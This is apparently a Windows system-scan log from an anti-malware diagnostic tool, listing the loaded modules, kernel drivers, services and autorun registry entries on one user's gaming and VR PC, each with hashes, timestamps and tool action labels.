C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\driver_lighthouse.dll Script: Quarantine, Delete, Delete via BC	1570766848	Lighthouse Driver	Copyright (C) Valve Corporation	MD5=D5223C2F6BE8F71346CE5F7B039785D0 2021.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04	13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\vrcamera_api.dll Script: Quarantine, Delete, Delete via BC	1570045952			MD5=D97550E81D41480D609F0D3A2B928120 476.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04	13792
C:\Program Files (x86)\Steam\steamclient.dll Script: Quarantine, Delete, Delete via BC	1668677632	Steamclient.dll	Copyright (C) 2005 Valve Corporation	MD5=B70A3826FE95EB6E0D3D86D5314D4539 18874.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20	13792
C:\Program Files (x86)\Steam\steamui.dll Script: Quarantine, Delete, Delete via BC	1723334656	SteamUI Dynamic Link Library	Copyright (C) 2007	MD5=9439DB24EB975CB006C85FF78B04A751 14135.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18	13792
C:\Program Files (x86)\Steam\tier0_s.dll Script: Quarantine, Delete, Delete via BC	1767309312	tier0_s Dynamic Link Library	Copyright (C) 2007	MD5=A916FDF39F909EA99A525487AF4799EC 341.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20	13792
C:\Program Files (x86)\Steam\video.dll Script: Quarantine, Delete, Delete via BC	1712521216			MD5=A4CB105E562D58F47E63F89894D31EE6 3757.35 kb, rsAh, created: 21.04.2020 17:33:19, modified: 21.07.2023 14:04:20	13792
C:\Program Files (x86)\Steam\vstdlib_s.dll Script: Quarantine, Delete, Delete via BC	1764884480	vstdlib_ s.dll	Copyright (C) 2005 Valve Corporation	MD5=6B25FD6DF4032786A14F4D334A0F5248 530.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:20	13792
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\X86\MPCLIENT.DLL Script: Quarantine, Delete, Delete via BC	1793130496	Client Interface	© Microsoft Corporation. All rights reserved.	MD5=619954A4C720E7EBF97481D0891F6B25 925.77 kb, rsAh, created: 13.06.2023 20:41:36, modified: 13.06.2023 20:41:33	17660, 16056, 17304, 19404, 13340, 16812, 16700, 15860, 13932, 16816
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\X86\MpOav.dll Script: Quarantine, Delete, Delete via BC	1822031872	IOfficeAntiVirus Module	© Microsoft Corporation. All rights reserved.	MD5=FDF32B91DD2C422169F7B7CB120E1B93 424.77 kb, rsAh, created: 13.06.2023 20:41:36, modified: 13.06.2023 20:41:33	13820, 24968, 1344, 16716, 17660, 17504, 16056, 17304, 19404, 13340, 16812, 16700, 13792, 15860, 13932, 16816
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\ffmpeg.dll Script: Quarantine, Delete, Delete via BC	1753022464			MD5=4127E49E61EBF6E9A747FBE5B5774EF1 3178.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12	1344, 9696, 20784, 10048, 9212, 19796
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_cloudsync-1\discord_cloudsync\discord_cloudsync.node Script: Quarantine, Delete, Delete via BC	1593114624			MD5=313D12E65D76F21005EDF179F2EAB297 3707.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_dispatch-1\discord_dispatch\discord_dispatch.node Script: Quarantine, Delete, Delete via BC	737411072			MD5=27B3BDE3EC2979744A9B821B6592FD54 8256.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_erlpack-1\discord_erlpack\discord_erlpack.node Script: Quarantine, Delete, Delete via BC	1634861056			MD5=F11F433578F4EB0D776D5F88D49B338D 412.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_game_utils-1\discord_game_utils\discord_game_utils.node Script: Quarantine, Delete, Delete via BC	1618804736			MD5=76A754956F8EDCCF10286559DB124036 796.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_krisp-1\discord_krisp\discord_krisp.node Script: Quarantine, Delete, Delete via BC	397869056			MD5=5AD611A64BCCF053AB8962FF90D78492 21323.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_media-1\discord_media\discord_media.node Script: Quarantine, Delete, Delete via BC	603193344			MD5=F858A80BA489FAB911C8A136D0CE6790 572.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_modules-1\discord_modules\discord_modules.node Script: Quarantine, Delete, Delete via BC	1523187712			MD5=3286608F45F872B657BA12BE0E074E56 373.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_overlay2-1\discord_overlay2\discord_overlay2.node Script: Quarantine, Delete, Delete via BC	1592524800			MD5=BF579436AA59861D2C75735F90670AD1 550.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_spellcheck-1\discord_spellcheck\node_modules\cld\build\Release\cld.node Script: Quarantine, Delete, Delete via BC	1628438528			MD5=9804C885A999AB50C55822279C126DF2 2652.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\discord_utils.node Script: Quarantine, Delete, Delete via BC	1635319808			MD5=A76F9493F5952B81D9DD91BCEBFE645E 606.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\macos-notification-state\build\Release\notificationstate.node Script: Quarantine, Delete, Delete via BC	1636499456			MD5=8602CDD374996BA336802ADFC3ED86D6 449.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\windows-notification-state\build\Release\notificationstate.node Script: Quarantine, Delete, Delete via BC	1635975168			MD5=2F01C06C9ABB27F410CB3622A4DB5E0D 470.27 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_utils-1\discord_utils\node_modules\windows-quiet-hours\build\Release\quiethours.node Script: Quarantine, Delete, Delete via BC	1627389952			MD5=DE8ECE5006910B83E104551CABEF10E4 456.77 kb, rsAh, created: 12.07.2023 17:42:14, modified: 12.07.2023 17:42:14	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_voice-2\discord_voice\discord_voice.node Script: Quarantine, Delete, Delete via BC	1649344512			MD5=5FE367F5109BE16151211A23197D4028 14504.77 kb, rsAh, created: 14.07.2023 12:45:50, modified: 14.07.2023 12:45:50	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\modules\discord_voice-2\discord_voice\mediapipe.dll Script: Quarantine, Delete, Delete via BC	1641611264			MD5=875B1C9C331DA3847383AA73A8BFED07 5138.77 kb, rsAh, created: 14.07.2023 12:45:50, modified: 14.07.2023 12:45:50	1344
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\updater.node Script: Quarantine, Delete, Delete via BC	1749483520			MD5=A91C4977FDFC95C496A9A184354023ED 3456.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12	20784
C:\Users\Isaac\AppData\Local\Discord\app-1.0.9015\vk_swiftshader.dll Script: Quarantine, Delete, Delete via BC	1738080256	SwiftShader Vulkan 32-bit Dynamic Link Library	Copyright (C) 2018 Google Inc.	MD5=B377B0371BA91B4FE533D5C302A7F002 4400.77 kb, rsAh, created: 12.07.2023 17:42:12, modified: 12.07.2023 17:42:12	19796
C:\WINDOWS\SYSTEM32\MSVCP140.dll Script: Quarantine, Delete, Delete via BC	1849229312	Microsoft® C Runtime Library	© Microsoft Corporation. All rights reserved.	MD5=DC739066C9D0CA961CBA2F320CADE28E 437.90 kb, rsAh, created: 10.05.2023 07:02:12, modified: 10.05.2023 07:02:12	5200, 13792
C:\WINDOWS\SYSTEM32\VCRUNTIME140.dll Script: Quarantine, Delete, Delete via BC	1849688064	Microsoft® C Runtime Library	© Microsoft Corporation. All rights reserved.	MD5=1D4FF3CF64AB08C66AE9A4013C89A3AC 88.40 kb, rsAh, created: 10.05.2023 07:02:12, modified: 10.05.2023 07:02:12	5200, 13792
Modules found:347, recognized as trusted 298

Kernel Space Modules Viewer

Module	Redirector	Base address	Size in memory	Description	Manufacturer
C:\WINDOWS\system32\drivers\wd\WdFilter.sys 487.25 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	292C0000	0007E000 (516096)	Microsoft antimalware file system filter driver	© Microsoft Corporation. All rights reserved.
C:\Program Files\Riot Vanguard\vgk.sys 22855.19 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 04:03:40 Script: Quarantine, Delete, Delete via BC	x64	42560000	01624000 (23216128)	Vanguard kernel-mode driver.	Copyright (C) 2021
C:\WINDOWS\System32\Drivers\dump_dumpstorport.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	6EF60000	00011000 (69632)
C:\WINDOWS\System32\drivers\dump_stornvme.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	6EFC0000	0003B000 (241664)
C:\WINDOWS\System32\Drivers\dump_dumpfve.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64	6A380000	0001E000 (122880)
C:\WINDOWS\system32\drivers\wd\WdNisDrv.sys 97.23 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	46190000	0001C000 (114688)	Windows Defender Network Stream Filter	© Microsoft Corporation. All rights reserved.
C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A3E1BB73-60A5-490A-855B-BEC991156312}\MpKslDrv.sys 216.29 kb, rsAh, created: 23.07.2023 13:25:50, modified: 23.07.2023 13:25:50 Script: Quarantine, Delete, Delete via BC	x64	8CF50000	0003A000 (237568)	KSLD	© Microsoft Corporation. All rights reserved.
Items found - 226, recognized as trusted - 219

Services

Service	Description	Status	File name	Redirector	Description	Manufacturer	Group	Dependencies
Apple Mobile Device Service Service: Stop, Delete, Disable, Delete via BC	Apple Mobile Device Service	Running	C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC	x64	MobileDeviceService	© 2022 Apple Inc. All rights reserved.		Tcpip
BEService Service: Stop, Delete, Disable, Delete via BC	BattlEye Service	Not started	C:\Program Files (x86)\Common Files\BattlEye\BEService.exe 9649.26 kb, rsAh, created: 03.05.2020 14:50:45, modified: 11.01.2023 17:05:22 Script: Quarantine, Delete, Delete via BC	x64
bookingdesktopapp Service: Stop, Delete, Disable, Delete via BC	bookingDesktopApp Update Service (bookingdesktopapp)	Running	C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe 100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39 Script: Quarantine, Delete, Delete via BC	x64	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.		RPCSS
bookingdesktopappm Service: Stop, Delete, Disable, Delete via BC	bookingDesktopApp Update Service (bookingdesktopappm)	Not started	C:\Program Files (x86)\bookingDesktopApp\Update\bookingDesktopAppUpdate.exe 100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39 Script: Quarantine, Delete, Delete via BC	x64	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.		RPCSS
CAMService Service: Stop, Delete, Disable, Delete via BC	CAM Service	Running	C:\Program Files\NZXT CAM\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe 632.94 kb, rsAh, created: 06.07.2023 00:16:45, modified: 05.07.2023 11:34:42 Script: Quarantine, Delete, Delete via BC	x64
EABackgroundService Service: Stop, Delete, Disable, Delete via BC	EABackgroundService	Not started	C:\Program Files\Electronic Arts\EA Desktop\EA Desktop\EABackgroundService.exe 11234.60 kb, rsAh, created: 15.07.2023 00:27:25, modified: 15.07.2023 00:27:26 Script: Quarantine, Delete, Delete via BC	x64	EA Background Service	Copyright (c) 2023
EasyTuneEngineService Service: Stop, Delete, Disable, Delete via BC	EasyTune Engine	Running	C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\EasyTuneEngineService.exe 141.22 kb, rsAh, created: 05.11.2020 17:43:28, modified: 05.11.2020 17:43:28 Script: Quarantine, Delete, Delete via BC	x64	EasyTuneEngineService	Copyright © 2014 GIGA-BYTE TECHNOLOGY CO., LTD.
EpicOnlineServices Service: Stop, Delete, Disable, Delete via BC	Epic Online Services	Not started	C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe 912.45 kb, rsAh, created: 27.08.2022 00:27:16, modified: 11.07.2022 16:58:56 Script: Quarantine, Delete, Delete via BC	x64	Epic Online Services Host	Copyright (c) 2008-2021 Epic Games, Inc., Kohsuke Kawaguchi, Sun Microsystems, Inc., CloudBees, Inc., Oleg Nenashev and other contributors
EQU8_36 Service: Stop, Delete, Disable, Delete via BC	EQU8_36	Not started	C:\ProgramData\EQU8\Splitgate\bin\anticheat.x64.equ8.exe 5892.14 kb, rsAh, created: 25.07.2021 19:28:09, modified: 25.07.2021 15:56:57 Script: Quarantine, Delete, Delete via BC	x64	EQU8 Anti-Cheat	Copyright (C) 2021 - Int3 Software AB
GameInput Service Service: Stop, Delete, Disable, Delete via BC	GameInput Service	Running	C:\Program Files (x86)\Microsoft GameInput\x64\gameinputsvc.exe 89.50 kb, rsAh, created: 26.02.2023 04:38:52, modified: 26.02.2023 04:38:52 Script: Quarantine, Delete, Delete via BC	x64	GameInput Host Service	© Microsoft Corporation. All rights reserved.
GamingServices Service: Stop, Delete, Disable, Delete via BC	Gaming Services	Running	C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe 73.45 kb, rsAh, created: 17.03.2023 02:07:08, modified: 17.03.2023 02:07:10 Script: Quarantine, Delete, Delete via BC	x64	GamingServices	© Microsoft Corporation. All rights reserved.		staterepository
GamingServicesNet Service: Stop, Delete, Disable, Delete via BC	Gaming Services	Running	C:\Program Files\WindowsApps\Microsoft.GamingServices_10.75.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe 73.45 kb, rsAh, created: 17.03.2023 02:07:08, modified: 17.03.2023 02:07:10 Script: Quarantine, Delete, Delete via BC	x64	GamingServices	© Microsoft Corporation. All rights reserved.		staterepository
GbtCareBotService Service: Stop, Delete, Disable, Delete via BC	GbtCareBotService	Running	C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotService.exe 134.92 kb, rsAh, created: 06.09.2018 15:53:26, modified: 06.09.2018 15:53:26 Script: Quarantine, Delete, Delete via BC	x64	GbtCareBotService	Copyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.
GoogleChromeElevationService Service: Stop, Delete, Disable, Delete via BC	Google Chrome Elevation Service (GoogleChromeElevationService)	Not started	C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\elevation_service.exe 1701.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:27 Script: Quarantine, Delete, Delete via BC	x64	Google Chrome	Copyright 2023 Google LLC. All rights reserved.		RPCSS
LGHUBUpdaterService Service: Stop, Delete, Disable, Delete via BC	LGHUB Updater Service	Running	C:\Program Files\LGHUB\lghub_updater.exe 10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC	x64	LGHUB Updater	Copyright © Logitech, Inc. 2023
MicrosoftEdgeElevationService Service: Stop, Delete, Disable, Delete via BC	Microsoft Edge Elevation Service (MicrosoftEdgeElevationService)	Not started	C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\elevation_service.exe 1709.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC	x64	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.		RPCSS
OcButtonService Service: Stop, Delete, Disable, Delete via BC	OcButtonService	Not started	C:\Program Files (x86)\GIGABYTE\EasyTuneEngineService\OcButtonService.exe 122.72 kb, rsAh, created: 03.11.2020 10:51:22, modified: 03.11.2020 10:51:22 Script: Quarantine, Delete, Delete via BC	x64	OcButtonService	Copyright © 2015 GIGA-BYTE TECHNOLOGY CO., LTD.
OverwolfUpdater Service: Stop, Delete, Disable, Delete via BC	Overwolf Updater Windows SCM	Not started	C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe 2579.51 kb, rsAh, created: 16.07.2023 07:11:00, modified: 16.07.2023 07:11:00 Script: Quarantine, Delete, Delete via BC	x64	OverwolfUpdater	Copyright Overwolf © 2023
OVRLibraryService Service: Stop, Delete, Disable, Delete via BC	Oculus VR Library Service	Not started	D:\Oculus\Support\oculus-librarian\OVRLibraryService.exe 144.55 kb, rsAh, created: 06.07.2023 17:33:53, modified: 06.07.2023 17:33:54 Script: Quarantine, Delete, Delete via BC	x64	OVRLibraryService	Copyright © Facebook Technologies, LLC
OVRService Service: Stop, Delete, Disable, Delete via BC	Oculus VR Runtime Service	Running	D:\Oculus\Support\oculus-runtime\OVRServiceLauncher.exe 497.05 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC	x64	OVR Service Launcher	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
Rockstar Service Service: Stop, Delete, Disable, Delete via BC	Rockstar Game Library Service	Not started	C:\Program Files\Rockstar Games\Launcher\RockstarService.exe 2167.40 kb, rsAh, created: 16.02.2021 07:27:30, modified: 04.06.2021 23:13:04 Script: Quarantine, Delete, Delete via BC	x64	Rockstar Games Launcher Service	Rockstar Games Inc. (C) 2005-2021 Take Two Interactive. All rights reserved
sherpa_service Service: Stop, Delete, Disable, Delete via BC	Blue Sherpa service	Running	C:\Program Files\Blue Sherpa\sherpa_service.exe 339.92 kb, rsAh, created: 01.08.2020 11:58:35, modified: 01.08.2020 11:58:35 Script: Quarantine, Delete, Delete via BC	x64
Steam Client Service Service: Stop, Delete, Disable, Delete via BC	Steam Client Service	Running	C:\Program Files (x86)\Common Files\Steam\SteamService.exe 2600.35 kb, rsAh, created: 21.04.2020 17:32:29, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC	x64	Steam Client Service	Copyright (C) Valve Corporation
Updater Service: Stop, Delete, Disable, Delete via BC	Updater	Not started	C:\Program Files\Virtual Desktop Streamer\Updater.exe 1136.21 kb, rsAh, created: 18.12.2022 19:38:44, modified: 18.12.2022 19:38:44 Script: Quarantine, Delete, Delete via BC	x64	Updater 1.25.10	Copyright (C) 2022 Virtual Desktop, Inc.
vgc Service: Stop, Delete, Disable, Delete via BC	vgc	Not started	C:\Program Files\Riot Vanguard\vgc.exe 10789.01 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 10:52:25 Script: Quarantine, Delete, Delete via BC	x64	Vanguard user-mode service.	Copyright (C) 2021
VirtualDesktop.Service.exe Service: Stop, Delete, Disable, Delete via BC	Virtual Desktop Service	Running	C:\Program Files\Virtual Desktop\VirtualDesktop.Service.exe 10407.71 kb, rsAh, created: 16.12.2022 13:24:54, modified: 16.12.2022 13:24:54 Script: Quarantine, Delete, Delete via BC	x64	Virtual Desktop Service	Copyright © Virtual Desktop, Inc. 2014-2022
WdNisSvc Service: Stop, Delete, Disable, Delete via BC	Microsoft Defender Antivirus Network Inspection Service	Running	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\NisSrv.exe 3156.81 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Microsoft Network Realtime Inspection Service	© Microsoft Corporation. All rights reserved.		WdNisDrv
WinDefend Service: Stop, Delete, Disable, Delete via BC	Microsoft Defender Antivirus Service	Running	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MsMpEng.exe 130.46 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Antimalware Service Executable	© Microsoft Corporation. All rights reserved.		RpcSs
Items found - 305, recognized as trusted - 277

Drivers

Service	Description	Status	File name	Redirector	Description	Manufacturer	Group	Dependencies
EQU8_HELPER_36 Driver: Unload, Delete, Disable, Delete via BC	EQU8_HELPER_36	Not started	C:\WINDOWS\system32\DRIVERS\EQU8_HELPER_36.sys 37.14 kb, rsAh, created: 25.07.2021 19:28:10, modified: 18.08.2021 13:05:32 Script: Quarantine, Delete, Delete via BC	x64
iaLPSS2_GPIO2 Driver: Unload, Delete, Disable, Delete via BC	Intel(R) Serial IO GPIO Driver v2	Not started	C:\WINDOWS\System32\drivers\iaLPSS2_GPIO2.sys 126.50 kb, rsAh, created: 27.01.2019 23:28:02, modified: 27.01.2019 23:28:02 Script: Quarantine, Delete, Delete via BC	x64	Intel(R) Serial IO GPIO Driver v2	Copyright © 2015, Intel Corporation.	Extended Base
MpKsl8d91288d Driver: Unload, Delete, Disable, Delete via BC	MpKsl8d91288d	Not started	C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{643F9B41-4B05-4C7D-AA03-8E842C38279A}\MpKslDrv.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64
RzDev_022b Driver: Unload, Delete, Disable, Delete via BC	Razer 022b Service	Not started	C:\WINDOWS\System32\drivers\RzDev_022b.sys 51.06 kb, rsAh, created: 17.02.2020 10:29:26, modified: 17.02.2020 10:29:26 Script: Quarantine, Delete, Delete via BC	x64	Razer Device Driver	Copyright © 2020 Razer Inc. All rights reserved
SIVDriver Driver: Unload, Delete, Disable, Delete via BC	SIV Kernel Driver	Not started	C:\WINDOWS\system32\Drivers\SIVX64.sys 200.73 kb, rsAh, created: 23.07.2023 02:00:44, modified: 23.07.2023 01:54:35 Script: Quarantine, Delete, Delete via BC	x64	System Information Viewer X64 Driver	Copyright© Ray Hinchliffe 2001-2021
vgk Driver: Unload, Delete, Disable, Delete via BC	vgk	Running	C:\Program Files\Riot Vanguard\vgk.sys 22855.19 kb, rsAh, created: 12.08.2020 12:52:11, modified: 19.06.2023 04:03:40 Script: Quarantine, Delete, Delete via BC	x64	Vanguard kernel-mode driver.	Copyright (C) 2021	System Reserved
WdBoot Driver: Unload, Delete, Disable, Delete via BC	Microsoft Defender Antivirus Boot Driver	Not started	C:\WINDOWS\system32\drivers\wd\WdBoot.sys 48.40 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Microsoft antimalware boot driver	© Microsoft Corporation. All rights reserved.	Early-Launch
WdFilter Driver: Unload, Delete, Disable, Delete via BC	Microsoft Defender Antivirus Mini-Filter Driver	Running	C:\WINDOWS\system32\drivers\wd\WdFilter.sys 487.25 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Microsoft antimalware file system filter driver	© Microsoft Corporation. All rights reserved.	FSFilter Anti-Virus	FltMgr
WdNisDrv Driver: Unload, Delete, Disable, Delete via BC	Microsoft Defender Antivirus Network Inspection System Driver	Running	C:\WINDOWS\system32\drivers\wd\WdNisDrv.sys 97.23 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Windows Defender Network Stream Filter	© Microsoft Corporation. All rights reserved.		BFE
WinSetupMon Driver: Unload, Delete, Disable, Delete via BC	WinSetupMon	Not started	C:\WINDOWS\system32\DRIVERS\WinSetupMon.sys error getting file info Script: Quarantine, Delete, Delete via BC	x64			FSFilter System	FltMgr
MpKsl4237837f Driver: Unload, Delete, Disable, Delete via BC	MpKsl4237837f	Running	C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A3E1BB73-60A5-490A-855B-BEC991156312}\MpKslDrv.sys 216.29 kb, rsAh, created: 23.07.2023 13:25:50, modified: 23.07.2023 13:25:50 Script: Quarantine, Delete, Delete via BC	x64	KSLD	© Microsoft Corporation. All rights reserved.
Items found - 416, recognized as trusted - 405

Autoruns

File name	Redirector	Startup method	Description
C:\Program Files\NZXT CAM\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe 632.94 kb, rsAh, created: 06.07.2023 00:16:45, modified: 05.07.2023 11:34:42 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CAM Service, EventMessageFile
C:\Windows\System32\icardres.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, EventMessageFile
C:\Windows\System32\icardres.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, CategoryMessageFile
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\eventlog_provider.dll 16.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:28 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Chrome, EventMessageFile
C:\Program Files (x86)\Google\Chrome\Application\114.0.5735.248\eventlog_provider.dll 16.77 kb, rsAh, created: 20.07.2023 20:42:27, modified: 20.07.2023 08:58:28 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Chrome, CategoryMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\eventlog_provider.dll 16.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Edge, EventMessageFile
C:\Program Files (x86)\Microsoft\Edge\Application\115.0.1901.183\eventlog_provider.dll 16.45 kb, rsAh, created: 23.07.2023 03:50:03, modified: 21.07.2023 02:01:25 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Edge, CategoryMessageFile
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.177.11\msedgeupdate.dll 2121.97 kb, rsAh, created: 06.07.2023 13:24:47, modified: 06.07.2023 13:24:47 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\edgeupdate, EventMessageFile
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.177.11\msedgeupdate.dll 2121.97 kb, rsAh, created: 06.07.2023 13:24:47, modified: 06.07.2023 13:24:47 Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\edgeupdatem, EventMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, EventMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, CategoryMessageFile
C:\WINDOWS\System32\IusEventLog.dll error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Intel(R) Capability Licensing Service Interface, EventMessageFile
C:\WINDOWS\System32\UI0Detect.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Registry key	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Interactive Services detection, EventMessageFile
